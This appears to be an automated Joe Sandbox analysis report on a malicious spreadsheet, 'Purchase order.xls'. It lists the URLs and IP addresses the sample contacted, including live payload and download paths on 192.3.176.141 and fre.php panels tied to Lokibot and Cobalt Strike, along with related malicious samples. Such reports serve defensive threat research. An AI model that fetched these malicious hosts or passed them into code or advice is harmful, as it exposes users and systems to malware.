                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://kbfvzoboss.bid/alien/fre.phptrue
                        unknown
                        https://qrisni.me/gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddlefalse
                          unknown
                          http://alphastand.top/alien/fre.phptrue
                            unknown
                            http://alphastand.win/alien/fre.phptrue
                              unknown
                              http://alphastand.trade/alien/fre.phptrue
                                unknown
                                http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIFtrue
                                  unknown
                                  http://94.156.177.220/simple/five/fre.phptrue
                                    unknown
                                    http://192.3.176.141/41/SMPLRTT.txttrue
                                      unknown
                                      94.156.177.220/simple/five/fre.phptrue
                                        unknown
                                        http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.htatrue
                                          unknown
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://qrisni.me/mshta.exe, 00000004.00000003.463938971.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463626399.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463261220.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463517039.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464246158.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463900149.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003818000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://192.3.176.141/41/simplethpowershell.exe, 00000005.00000002.511869443.0000000002282000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.498611259.000000000250E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://qrisni.me/Cmshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://192.3.176.141/mshta.exe, 00000004.00000003.463938971.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003829000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://ocsp.entrust.net03mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.ibsensoftware.com/aspnet_regbrowsers.exe, aspnet_regbrowsers.exe, 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta)-Qomshta.exe, 00000004.00000003.463626399.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463261220.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463517039.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464246158.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463900149.0000000000522000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta/mshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta1mshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://contoso.com/Licensepowershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://contoso.com/Iconpowershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://qrisni.me/Zmshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.htaGmshta.exe, 00000008.00000003.490007380.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003818000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.htahttp://192.3.176.141/41/cmshta.exe, 00000004.00000003.463769480.0000000002955000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.488620769.0000000003575000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489793798.0000000003575000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta:mshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://go.microspowershell.exe, 00000005.00000002.511869443.0000000002F7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://qrisni.me/gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&wamshta.exe, 00000008.00000002.491361921.000000000018F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.0000000003841000.00000004.00000020.00020000.00000000.sdmp, Purchase order.xls, 23530000.0.drfalse
                                                                      unknown
                                                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta...%252525mshta.exe, 00000004.00000003.463199089.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463213758.0000000003BD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.htaC:mshta.exe, 00000008.00000003.490007380.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003829000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://contoso.com/powershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://drive.google.compowershell.exe, 00000017.00000002.565176374.0000000002592000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://drive.usercontent.google.compowershell.exe, 00000017.00000002.565176374.0000000002751000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIF89powershell.exe, 00000005.00000002.519761992.000000001A220000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.499089877.000000001A89E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta...mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://qrisni.me/1;mshta.exe, 00000004.00000003.463626399.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463261220.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463517039.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464246158.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463900149.0000000000522000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.511869443.0000000002081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.498611259.0000000002121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.667153899.000000000230F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.565176374.0000000002391000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIFppowershell.exe, 00000005.00000002.511869443.0000000002282000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.498611259.000000000250E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://192.3.176.141/hmshta.exe, 00000008.00000003.490007380.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003829000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://go.crpowershell.exe, 00000005.00000002.520257981.000000001C14B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            192.3.176.141
                                                                                            unknownUnited States
                                                                                            36352AS-COLOCROSSINGUStrue
                                                                                            142.250.186.46
                                                                                            drive.google.comUnited States
                                                                                            15169GOOGLEUSfalse
                                                                                            188.114.97.3
                                                                                            qrisni.meEuropean Union
                                                                                            13335CLOUDFLARENETUSfalse
                                                                                            142.250.186.161
                                                                                            drive.usercontent.google.comUnited States
                                                                                            15169GOOGLEUSfalse
                                                                                            94.156.177.220
                                                                                            unknownBulgaria
                                                                                            43561NET1-ASBGtrue
                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1542327
                                                                                            Start date and time:2024-10-25 19:49:16 +02:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 7m 12s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                            Number of analysed new started processes analysed:27
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • GSI enabled (VBA)
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:Purchase order.xls
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.expl.evad.winXLS@29/44@6/5
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 50%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            • Number of executed functions: 55
                                                                                            • Number of non-executed functions: 6
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .xls
                                                                                            • Changed system and user locale, location and keyboard layout to French - France
                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                            • Attach to Office via COM
                                                                                            • Active ActiveX Object
                                                                                            • Active ActiveX Object
                                                                                            • Scroll down
                                                                                            • Close Viewer
                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                            • Execution Graph export aborted for target mshta.exe, PID 3164 because there are no executed function
                                                                                            • Execution Graph export aborted for target mshta.exe, PID 3848 because there are no executed function
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                            • VT rate limit hit for: Purchase order.xls
                                                                                            TimeTypeDescription
                                                                                            13:50:45API Interceptor151x Sleep call for process: mshta.exe modified
                                                                                            13:50:59API Interceptor614x Sleep call for process: powershell.exe modified
                                                                                            13:51:16API Interceptor25x Sleep call for process: wscript.exe modified
                                                                                            13:51:48API Interceptor400x Sleep call for process: aspnet_regbrowsers.exe modified
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            192.3.176.141Payment Advice.xlsGet hashmaliciousLokibotBrowse
                                                                                            • 192.3.176.141/42/LOGLKI.txt
                                                                                            seethebestthingsevermeetwithgreatthingstobegood.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                            • 192.3.176.141/42/logisticthingswithgoodthingsgivenbest.tIF
                                                                                            greatthingswithgoodnewsgivenbygodthingsgreat.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                            • 192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIF
                                                                                            seethebestthingstobegoodwithhislifebestthigns.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                            • 192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIF
                                                                                            nicegirlwithnewthingswhichevennobodknowthatkissingme.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                            • 192.3.176.141/35/educationalthingswithgreatattitudeonhere.tIF
                                                                                            SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxGet hashmaliciousLokibotBrowse
                                                                                            • 192.3.176.141/35/SMLPERR.txt
                                                                                            Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                                            • 192.3.176.141/36/LOGS%20LOKI.txt
                                                                                            Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                            • 192.3.176.141/43/LCRDDFR.txt
                                                                                            logicalwayofgreatthingswhichcreatedwithgreatwayofgood.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                            • 192.3.176.141/43/newthingswithgreatfturuewithgreatdaywellbetterforme.tIF
                                                                                            greatwayforbestthignswithwhonotwanttodo.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                            • 192.3.176.141/42/simplethingswithgreatfuturebetteronegetbackforme.tIF
                                                                                            188.114.97.3PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.cc101.pro/4hfb/
                                                                                            QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • filetransfer.io/data-package/cDXpxO66/download
                                                                                            Instruction_1928.pdf.lnk.download.lnkGet hashmaliciousLummaCBrowse
                                                                                            • tech-tribune.shop/pLQvfD4d5/index.php
                                                                                            WBCDZ4Z3M2667YBDZ5K4.bin.exeGet hashmaliciousUnknownBrowse
                                                                                            • tech-tribune.shop/pLQvfD4d5/index.php
                                                                                            yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                            • www.rs-ag.com/
                                                                                            https://is.gd/6NgVrQGet hashmaliciousHTMLPhisherBrowse
                                                                                            • aa.opencompanies.co.uk/vEXJm/
                                                                                            Comprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • paste.ee/d/KXy1F
                                                                                            01YP9Lwum8.exeGet hashmaliciousDCRatBrowse
                                                                                            • 77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn.php
                                                                                            PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                                            • www.freedietbuilder.online/nnla/
                                                                                            http://onlinecheapflights.net/Get hashmaliciousUnknownBrowse
                                                                                            • onlinecheapflights.net/
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            qrisni.mePayment Advice.xlsGet hashmaliciousLokibotBrowse
                                                                                            • 188.114.97.3
                                                                                            Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.97.3
                                                                                            Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.97.3
                                                                                            Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.97.3
                                                                                            Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.96.3
                                                                                            Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.96.3
                                                                                            Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xlsGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.97.3
                                                                                            PO%20K22012FA[1].docxGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.96.3
                                                                                            #PO247762.docxGet hashmaliciousRemcosBrowse
                                                                                            • 188.114.97.3
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            AS-COLOCROSSINGUSPayment Advice.xlsGet hashmaliciousLokibotBrowse
                                                                                            • 192.3.176.141
                                                                                            43655- Urgent - Request for Quotation.exeGet hashmaliciousRemcosBrowse
                                                                                            • 192.210.150.35
                                                                                            la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                            • 23.95.194.49
                                                                                            seethebestthingsevermeetwithgreatthingstobegood.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                            • 192.3.176.141
                                                                                            greatthingswithgoodnewsgivenbygodthingsgreat.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                            • 192.3.176.141
                                                                                            seethebestthingstobegoodwithhislifebestthigns.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                            • 192.3.176.141
                                                                                            la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                            • 107.174.214.206
                                                                                            la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                            • 172.245.19.71
                                                                                            la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                            • 104.168.36.51
                                                                                            Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 192.3.179.174
                                                                                            CLOUDFLARENETUS__5A1AACAD-4F60-4DC8-94AA-4866010B7794_.batGet hashmaliciousUnknownBrowse
                                                                                            • 104.16.230.132
                                                                                            Payment Advice.xlsGet hashmaliciousLokibotBrowse
                                                                                            • 188.114.96.3
                                                                                            https://www.google.ca/url?q=nyYhuJkyZc5becm4Aebd&rct=dHYJbECHyHBgmK2d6Hkk&sa=t&esrc=VPIIRnP5TJCWQChPCgwH&source=&cd=TWsylIzvnNqdQKP0bZIw&uact=&url=amp/uniquestarsent.com/ck/bd/BNsT048mrEEHImhtrfrgmcfu/a2Vubml0aC5jYXNlQGFkdmFuY2UtYXV0by5jb20Get hashmaliciousHTMLPhisherBrowse
                                                                                            • 104.17.25.14
                                                                                            Oct25_2024.htmGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                            • 104.17.25.14
                                                                                            https://accesspage853.ubpages.com/4k5-ffdfgGet hashmaliciousUnknownBrowse
                                                                                            • 104.18.41.137
                                                                                            https://beta.adiance.com/wp-content/plugins/arull.php?7096797967704b5369323074645079557a5054436e4e5379314f7a644d725474524c7a732f564c7a4f4b794d6a574277413dhttps://digidunesen.sa.com/v2Xhk/#X%5Bemail%5DGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 104.17.25.14
                                                                                            Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                            • 104.26.12.205
                                                                                            https://link.edgepilot.com/s/8e0e5379/EMW5cxymxkqj1qgquAdAJg?u=https://1drv.ms/o/c/67a50aba8b4bc7df/Es0QkMhT9wJGqs_vzb8xaRQBgzED6dWk5_dCMe34N16rYQ?e=5%253aTtRWoI%26sharingv2=true%26fromShare=true%26at=9&c=E,1,DNZ_Csfpwg3nzWxVo2TSq2LzcEM3C6hdkfA-QbvL5dwYrcj0RsSt_vroZV-UqAThZkP5E_WMmdbQ82a_nveA3iNTPpg_CIcQxQFCbK60ykcRIVrxnkr2VnkbdtuE&typo=1Get hashmaliciousUnknownBrowse
                                                                                            • 188.114.96.3
                                                                                            http://asgardcapitalpartners-sharepoint.comGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 104.17.25.14
                                                                                            file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                            • 172.67.68.212
                                                                                            NET1-ASBGPayment Advice.xlsGet hashmaliciousLokibotBrowse
                                                                                            • 94.156.177.220
                                                                                            dw7h7aQwVZ.exeGet hashmaliciousLokibotBrowse
                                                                                            • 94.156.177.220
                                                                                            1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeGet hashmaliciousLokibotBrowse
                                                                                            • 94.156.177.220
                                                                                            SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsxGet hashmaliciousLokibotBrowse
                                                                                            • 94.156.177.220
                                                                                            sample.binGet hashmaliciousOkiruBrowse
                                                                                            • 93.123.85.166
                                                                                            Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                                            • 94.156.177.220
                                                                                            Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                            • 94.156.177.220
                                                                                            SOA October 24_1.docGet hashmaliciousLokibotBrowse
                                                                                            • 94.156.177.220
                                                                                            17296631442c81ba7f9716fbc1aab98d3cbe332f196a0c4ba623a6879e4902adfc5aa38233992.dat-decoded.exeGet hashmaliciousLokibotBrowse
                                                                                            • 94.156.177.220
                                                                                            hZ6ZMDS1rc.exeGet hashmaliciousAsyncRATBrowse
                                                                                            • 93.123.39.76
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
